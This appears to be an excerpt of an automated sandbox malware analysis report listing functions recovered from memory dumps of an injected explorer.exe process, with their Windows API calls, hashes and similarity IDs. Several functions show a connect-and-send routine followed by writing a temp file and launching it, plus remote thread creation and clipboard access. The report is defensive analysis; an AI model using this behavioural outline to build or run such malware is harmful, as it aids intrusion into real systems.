                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F70DF
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F70F3
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F7107
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F7118
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F712C
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F714A
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: wsprintfA.USER32 ref: 101F7162
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F7176
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F718A
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrcatA.KERNEL32 ref: 101F71C6
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: WSAStartup.WS2_32 ref: 101F71D6
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: socket.WS2_32 ref: 101F71F2
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: gethostbyname.WS2_32 ref: 101F7209
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: memcpy.MSVCRT ref: 101F7229
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: htons.WS2_32 ref: 101F7238
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: connect.WS2_32 ref: 101F724F
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: lstrlenA.KERNEL32 ref: 101F7265
                                                                                                                                                                                                                                    • Part of subcall function 101F7070: send.WS2_32 ref: 101F727B
                                                                                                                                                                                                                                  • PathFindFileNameA.SHLWAPI ref: 102051A1
                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32 ref: 102051BF
                                                                                                                                                                                                                                  • GetTempFileNameA.KERNEL32 ref: 102051D5
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 102051E5
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 102051F1
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 1020521A
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 1020523F
                                                                                                                                                                                                                                  • free.MSVCRT ref: 1020524E
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 10205257
                                                                                                                                                                                                                                  • ShellExecuteA.SHELL32 ref: 10205285
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 10205294
                                                                                                                                                                                                                                  • free.MSVCRT ref: 1020529F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3619236930-0
                                                                                                                                                                                                                                  • Opcode ID: 7ecfd1c38ba8e442a98d9586bc9e0933db9910eba4d4230b8b6c88557bb2a767
                                                                                                                                                                                                                                  • Instruction ID: 0a5ff7f7292ae5f783ac1ad3fceb320ddced63322a600d884c9260d5f008d368
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ecfd1c38ba8e442a98d9586bc9e0933db9910eba4d4230b8b6c88557bb2a767
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF518036714B518AEB10CF62E8A83DE77A1FB88B88F504415EE894BB58DF7CC595CB00
                                                                                                                                                                                                                                  Function 0E0EDC48 Relevance: 19.6, APIs: 13, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __crtGetLocaleInfoA.LIBCMT ref: 0E0EDCA1
                                                                                                                                                                                                                                    • Part of subcall function 0E0F4800: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E0F4820
                                                                                                                                                                                                                                    • Part of subcall function 0E0F4800: __crtGetLocaleInfoA_stat.LIBCMT ref: 0E0F483E
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0E0EDCAD
                                                                                                                                                                                                                                  • __crtGetLocaleInfoA.LIBCMT ref: 0E0EDCC9
                                                                                                                                                                                                                                  • __crtGetLocaleInfoA.LIBCMT ref: 0E0EDD00
                                                                                                                                                                                                                                  • _calloc_crt.LIBCMT ref: 0E0EDCDC
                                                                                                                                                                                                                                    • Part of subcall function 0E0EE39C: _calloc_impl.LIBCMT ref: 0E0EE3CA
                                                                                                                                                                                                                                    • Part of subcall function 0E0EE39C: Sleep.KERNEL32 ref: 0E0EE3E1
                                                                                                                                                                                                                                  • _calloc_crt.LIBCMT ref: 0E0EDD17
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0E0EDD2F
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0E0EDD7B
                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32 ref: 0E0EDD9E
                                                                                                                                                                                                                                  • _calloc_crt.LIBCMT ref: 0E0EDDB0
                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32 ref: 0E0EDDC8
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0E0EDDD4
                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32 ref: 0E0EDDFF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale$Info$__crt$_calloc_crtfree$A_statErrorLastSleepUpdateUpdate::__calloc_impl
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2895548159-0
                                                                                                                                                                                                                                  • Opcode ID: 5d72b1452663e38c5e4686aaa3876ec32168e7b5e2c31a480d3d4b2684a27660
                                                                                                                                                                                                                                  • Instruction ID: 1ea1f254057421bd246271c42cabdf89759f7b498f57d5601b6c915642b5f1e2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d72b1452663e38c5e4686aaa3876ec32168e7b5e2c31a480d3d4b2684a27660
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2541E5327292814DEB66AA76E520BBA66D1FB85FC4F044931CE455BF08EF3DC8028701
                                                                                                                                                                                                                                  Function 0DF3DC48 Relevance: 19.6, APIs: 13, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __crtGetLocaleInfoA.LIBCMT ref: 0DF3DCA1
                                                                                                                                                                                                                                    • Part of subcall function 0DF44800: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DF44820
                                                                                                                                                                                                                                    • Part of subcall function 0DF44800: __crtGetLocaleInfoA_stat.LIBCMT ref: 0DF4483E
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0DF3DCAD
                                                                                                                                                                                                                                  • __crtGetLocaleInfoA.LIBCMT ref: 0DF3DCC9
                                                                                                                                                                                                                                  • __crtGetLocaleInfoA.LIBCMT ref: 0DF3DD00
                                                                                                                                                                                                                                  • _calloc_crt.LIBCMT ref: 0DF3DCDC
                                                                                                                                                                                                                                    • Part of subcall function 0DF3E39C: _calloc_impl.LIBCMT ref: 0DF3E3CA
                                                                                                                                                                                                                                    • Part of subcall function 0DF3E39C: Sleep.KERNEL32 ref: 0DF3E3E1
                                                                                                                                                                                                                                  • _calloc_crt.LIBCMT ref: 0DF3DD17
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0DF3DD2F
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0DF3DD7B
                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32 ref: 0DF3DD9E
                                                                                                                                                                                                                                  • _calloc_crt.LIBCMT ref: 0DF3DDB0
                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32 ref: 0DF3DDC8
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0DF3DDD4
                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32 ref: 0DF3DDFF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale$Info$__crt$_calloc_crtfree$A_statErrorLastSleepUpdateUpdate::__calloc_impl
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2895548159-0
                                                                                                                                                                                                                                  • Opcode ID: 5d72b1452663e38c5e4686aaa3876ec32168e7b5e2c31a480d3d4b2684a27660
                                                                                                                                                                                                                                  • Instruction ID: 93c82db2e3fead643066c8abc13c1bd93a784f5412285014b833ae85e7baa92e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d72b1452663e38c5e4686aaa3876ec32168e7b5e2c31a480d3d4b2684a27660
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9412622B1928145EB65AE7EAD10B3A7B95BB85FC4F07C525DF096BB04EF7CC4018710
                                                                                                                                                                                                                                  Function 1020DC48 Relevance: 19.6, APIs: 13, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __crtGetLocaleInfoA.LIBCMT ref: 1020DCA1
                                                                                                                                                                                                                                    • Part of subcall function 10214800: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10214820
                                                                                                                                                                                                                                    • Part of subcall function 10214800: __crtGetLocaleInfoA_stat.LIBCMT ref: 1021483E
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 1020DCAD
                                                                                                                                                                                                                                  • __crtGetLocaleInfoA.LIBCMT ref: 1020DCC9
                                                                                                                                                                                                                                  • __crtGetLocaleInfoA.LIBCMT ref: 1020DD00
                                                                                                                                                                                                                                  • _calloc_crt.LIBCMT ref: 1020DCDC
                                                                                                                                                                                                                                    • Part of subcall function 1020E39C: _calloc_impl.LIBCMT ref: 1020E3CA
                                                                                                                                                                                                                                    • Part of subcall function 1020E39C: Sleep.KERNEL32 ref: 1020E3E1
                                                                                                                                                                                                                                  • _calloc_crt.LIBCMT ref: 1020DD17
                                                                                                                                                                                                                                  • free.LIBCMT ref: 1020DD2F
                                                                                                                                                                                                                                  • free.LIBCMT ref: 1020DD7B
                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32 ref: 1020DD9E
                                                                                                                                                                                                                                  • _calloc_crt.LIBCMT ref: 1020DDB0
                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32 ref: 1020DDC8
                                                                                                                                                                                                                                  • free.LIBCMT ref: 1020DDD4
                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32 ref: 1020DDFF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale$Info$__crt$_calloc_crtfree$A_statErrorLastSleepUpdateUpdate::__calloc_impl
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2895548159-0
                                                                                                                                                                                                                                  • Opcode ID: 5d72b1452663e38c5e4686aaa3876ec32168e7b5e2c31a480d3d4b2684a27660
                                                                                                                                                                                                                                  • Instruction ID: 2dfe6a4534df37b2f34a29e5baba73933316012df2b33bdb91ee0d51fb61bbae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d72b1452663e38c5e4686aaa3876ec32168e7b5e2c31a480d3d4b2684a27660
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C41296772238246EB55EF62A911B6E6691FB85FC4F215521DE095BB0CEF3CD8218B00
                                                                                                                                                                                                                                  Function 0E0D3E90 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: OpenProcess
                                                                                                                                                                                                                                  • String ID: @$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                                  • API String ID: 3743895883-3701502330
                                                                                                                                                                                                                                  • Opcode ID: 1c957289a53d985cf98daa53e2778eb7b04d462c296fa52f8d6702081a069013
                                                                                                                                                                                                                                  • Instruction ID: 5048a2d59a06cced7f0c73f321061cd2fb0f408b4438a3d99d0951ea13b7bdb1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c957289a53d985cf98daa53e2778eb7b04d462c296fa52f8d6702081a069013
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B41CB32308B8586EB709F55F8503AAA7A4FB89BC4F884425DA9D43B48DF3CC899C704
                                                                                                                                                                                                                                  Function 0DF23E90 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: OpenProcess
                                                                                                                                                                                                                                  • String ID: @$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                                  • API String ID: 3743895883-3701502330
                                                                                                                                                                                                                                  • Opcode ID: 1c957289a53d985cf98daa53e2778eb7b04d462c296fa52f8d6702081a069013
                                                                                                                                                                                                                                  • Instruction ID: da9ab27620ec86f250c9f00bb3dd89387cc0b803a5167699b12edf270f84b587
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c957289a53d985cf98daa53e2778eb7b04d462c296fa52f8d6702081a069013
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B415E62704B9186EB24DF59F84077AB2A4FB85B84F48802ADA8E47B58DF3CC599C710
                                                                                                                                                                                                                                  Function 101F3E90 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: OpenProcess
                                                                                                                                                                                                                                  • String ID: @$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                                  • API String ID: 3743895883-3701502330
                                                                                                                                                                                                                                  • Opcode ID: 1c957289a53d985cf98daa53e2778eb7b04d462c296fa52f8d6702081a069013
                                                                                                                                                                                                                                  • Instruction ID: 5b6aa1b7171c2fb4a443f7aa6f116f011f844063cb6b6058c33ab2f65ef6973f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c957289a53d985cf98daa53e2778eb7b04d462c296fa52f8d6702081a069013
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA419F32304B8986EB60DF55F84079AA3A4FB89BC4F948025EE9D43B58DF3CC999C704
                                                                                                                                                                                                                                  Function 08A1D57D Relevance: 15.2, APIs: 10, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale$Info__crt_calloc_crtfree$UpdateUpdate::__calloc_impl_invoke_watson
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3055818068-0
                                                                                                                                                                                                                                  • Opcode ID: 353547156d8ae6a6823b4771b3f4847b9e5a9eb9467d21c07a2c857aaf43ffaf
                                                                                                                                                                                                                                  • Instruction ID: dfbc23dc90144cf54da05ae653d5ddf8a6cc249fa1a8e0a6f3e1018fd68409da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 353547156d8ae6a6823b4771b3f4847b9e5a9eb9467d21c07a2c857aaf43ffaf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE51D735728A194BDF7DA72C59117BA73D6FB89616F10422EE89BC3B44EE24D80342C2
                                                                                                                                                                                                                                  Function 0AE4D57D Relevance: 15.2, APIs: 10, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale$Info__crt_calloc_crtfree$UpdateUpdate::__calloc_impl_invoke_watson
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3055818068-0
                                                                                                                                                                                                                                  • Opcode ID: 353547156d8ae6a6823b4771b3f4847b9e5a9eb9467d21c07a2c857aaf43ffaf
                                                                                                                                                                                                                                  • Instruction ID: 819ef8b8706aa3dbd3ac6da4102003b1ba5b420ed2f269b808684456f079b1d9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 353547156d8ae6a6823b4771b3f4847b9e5a9eb9467d21c07a2c857aaf43ffaf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0951EA31728A190BEB7DAF2C7C9577A33DAF7C9614F15616ED88BC3285DE24D8034682
                                                                                                                                                                                                                                  Function 0B30D57D Relevance: 15.2, APIs: 10, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale$Info__crt_calloc_crtfree$UpdateUpdate::__calloc_impl_invoke_watson
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3055818068-0
                                                                                                                                                                                                                                  • Opcode ID: 353547156d8ae6a6823b4771b3f4847b9e5a9eb9467d21c07a2c857aaf43ffaf
                                                                                                                                                                                                                                  • Instruction ID: 08b804a49aa6d657fb8c3beaf88615d36c2c42182209053fafcece7bbc42d34d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 353547156d8ae6a6823b4771b3f4847b9e5a9eb9467d21c07a2c857aaf43ffaf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1451B331738A194FD76DAB6C582277A72D6FF89714F60463EDC8BC32C4EE24D8024682
                                                                                                                                                                                                                                  Function 0E0E7B50 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1677084743-0
                                                                                                                                                                                                                                  • Opcode ID: 797229ca0b284241fcd0ff3ada81cb235e853b1f7dff7f8d491220037e39312b
                                                                                                                                                                                                                                  • Instruction ID: 2dc51dc93eea27f8329a78148ecc68a7ed0bffceb4a5f4b678c6dc9f609e8867
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 797229ca0b284241fcd0ff3ada81cb235e853b1f7dff7f8d491220037e39312b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2015635304A81C2EA14AB62F81839A7361E789FC0F488931DA5A17B64CE3CC4968784
                                                                                                                                                                                                                                  Function 0DF37B50 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1677084743-0
                                                                                                                                                                                                                                  • Opcode ID: 797229ca0b284241fcd0ff3ada81cb235e853b1f7dff7f8d491220037e39312b
                                                                                                                                                                                                                                  • Instruction ID: 7fbcd2197a9e874a39e58150790f434bc451c1453b5840e9e0fda45536262d36
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 797229ca0b284241fcd0ff3ada81cb235e853b1f7dff7f8d491220037e39312b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69018F25604A5282EB04AB92F81837A7361FB49FC0F08C136DF4B07B55CF3CC5858358
                                                                                                                                                                                                                                  Function 10207B50 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1677084743-0
                                                                                                                                                                                                                                  • Opcode ID: 797229ca0b284241fcd0ff3ada81cb235e853b1f7dff7f8d491220037e39312b
                                                                                                                                                                                                                                  • Instruction ID: b6b35bbcc840d999553a3cb9933cab1f17099339be44ffe7527f9d7db5712c76
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 797229ca0b284241fcd0ff3ada81cb235e853b1f7dff7f8d491220037e39312b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6012C75604A4482EB04AB52B81839A7361F749FC0F448135DF9A0B758CF7DD49AC744
                                                                                                                                                                                                                                  Function 0DF37960 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1006321803-0
                                                                                                                                                                                                                                  • Opcode ID: 3f6fdb9662fdaab80e8b146d8066cb7615450abca20b9742a7ef6fa3840ebc62
                                                                                                                                                                                                                                  • Instruction ID: a6f0f3e5b0121e379a40deba90263c743beb0a959efe8b4dada655b354728505
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f6fdb9662fdaab80e8b146d8066cb7615450abca20b9742a7ef6fa3840ebc62
